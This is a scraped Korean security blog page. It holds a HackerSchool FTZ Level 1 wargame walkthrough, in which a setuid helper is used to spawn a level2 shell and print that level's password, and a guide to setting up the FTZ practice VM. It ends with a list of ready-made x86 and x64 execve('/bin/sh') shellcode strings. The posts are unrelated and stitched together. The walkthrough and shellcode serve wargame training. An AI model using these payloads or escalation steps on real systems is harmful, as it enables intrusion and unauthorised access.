반응형
반응형
반응형


해커스쿨 FTZ [LEVEL1] 풀이


M4ndU




해커스쿨 FTZ [LEVEL1] 풀이입니다.


ID | level1

PW | level1


으로 로그인합니다.



$ ls -l


를 이용해  어떤 파일과 어떤 폴더가 있는지 확인해 봅시다.




login as: level1

level1@192.168.31.128's password:

[level1@ftz level1]$ ls -l

total 12

-rw-r--r--    1 root     root           47 Apr  4  2000 hint

drwxr-xr-x    2 root     level1       4096 Dec  7  2003 public_html

drwxrwxr-x    2 root     level1       4096 Jan 16  2009 tmp



hint 파일이 있습니다.


cat 명령어를 통해 hint 파일의 내용을 확인해 봅시다.


[level1@ftz level1]$ cat hint



level2 권한에 setuid가 걸린 파일을 찾는다.


level2 권한에 setuid가 걸린 파일을 찾아 봅시다.


find 명령어를 사용하면 됩니다.


[level1@ftz level1]$ find / -user level2 -perm -4300

find: /lost+found: Permission denied

find: /boot/lost+found: Permission denied

find: /proc/1/fd: Permission denied

find: /proc/2/fd: Permission denied

find: /proc/3/fd: Permission denied

....(생략)


하지만 오류가 많아서 우리가 찾고자 하는 파일을 찾기 힘듭니다.

그래서 이 오류들을 제외시켜주는 옵션을 추가해 줍시다.


바로 2> /dev/null 입니다.

여기서 2는 표준에러, /dev/null은 휴지통을 의미합니다.


[level1@ftz level1]$ find / -user level2 -perm -4300 2> /dev/null

/bin/ExecuteMe


찾았습니다!

ExecuteMe가 존재하는 /bin으로 이동하고, ExecuteMe를 실행하겠습니다.


[level1@ftz level1]$ cd /bin

[level1@ftz bin]$ ./ExecuteMe




                레벨2의 권한으로 당신이 원하는 명령어를

                한가지 실행시켜 드리겠습니다.

                (단, my-pass 와 chmod는 제외)


                어떤 명령을 실행시키겠습니까?



                [level2@ftz level2]$



레벨2의 권한으로 원하는 명령어를 실행시켜 준다는데, my-pass와 chmod는 안된다고 합니다.

그렇지만 우리는 다른 방법으로도 level2의 패스워드를 얻을 수 있습니다.


level2의 권한으로 bash를 띄워서 my-pass 명령어를 사용하면 됩니다.


                [level2@ftz level2]$ bash



[level2@ftz level2]$ my-pass


Level2 Password is "hacker or cracker".


이제, 다음 레벨로 가즈아ㅏㅏㅏㅏㅏㅏㅏ

반응형
반응형

1. 준비


준비물

- VMware Workstation Player [다운로드 링크]

- Red Hat 9.0 파일과 ftz.iso 파일 [다운로드 링크]

- Putty [다운로드 링크]



1. VMware를 설치합니다.


2. Putty를 설치합니다.


3. 다운받은 압축파일(FTZ.zip)의 압축을 풀어주세요.


4. Vmware_Redhat_9_FTZ.zip 의 압축도 풀어주세요.





2. 구축하기



 

1. Vmware_Redhat_9_FTZ 폴더에서 Red Hat Linux.vmdk 파일을 실행합니다.





-만약 오류가 날경우, Vmware를 실행하신후, Open a Virtual Machine를 클릭합니다.

  Vmware_Redhat_9_FTZ 폴더의 Red Hat Linux.vmx 파일을 엽니다.






2. 좌측에서 Red Hat Linux 9.0를 클릭합니다.


우측 하단의 Edit virtual machine settings를 클릭합니다.




CD/DVD (IDE) 에서 Use ISO image file을 체크, Browse를 눌러 ftz.iso를 엽니다.




3. Play virtual machine 을 눌러 가상머신을 시작합니다.




I Copied It을 눌러 줍니다.

그리고 기다립니다.




root / hackerschool 로 로그인하고, ifconfig 명령어로 inet addr 부분을 확인합니다.



4. Putty를 실행합니다.



Host Name란에 inet addr의 ip주소를 넣어주고 Open을 클릭합니다.


level1 / level1 로 로그인하셔서 시작하시면 됩니다.





만약 한글이 깨져 보인다면?


0. Putty 에서 Window > Translation 에서 Remote character set을 CP949로 설정합니다.


안될경우

0. Putty 에서 Window > Translation 에서 Remote character set을 Use font encoding로 설정합니다.


안될경우

0. Putty 에서 서버 저장후

   Windows 검색 > regedit > HKEY_CURRENT_USER > Software > SimonTatham > Putty > Sessions

   저장한 서버에서 FontCharSet을 더블클릭, 81(16진수)또는 129(10진수)로 변경, LineCodePage를 더블클릭, CP949로 입력합니다.




반응형

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL5] 풀이  (2) 2018.02.07
해커스쿨 FTZ [LEVEL4] 풀이  (0) 2018.02.07
해커스쿨 FTZ [LEVEL3] 풀이  (0) 2018.02.07
해커스쿨 FTZ [LEVEL2] 풀이  (0) 2018.02.07
해커스쿨 FTZ [LEVEL1] 풀이  (1) 2018.02.07
반응형

25 Bytes Shell Code


\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80




26 Bytes Shell Code


\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80




41 Bytes Shell Code

    setreuid(geteuid(), getreuid()) 포함


\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80




48 Bytes Shell Code

    \x2f가 없는 쉘코드


\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81




x64

23 Bytes Shell Code


\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05




x64

31 Bytes Shell Code


\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05


반응형

+ Recent posts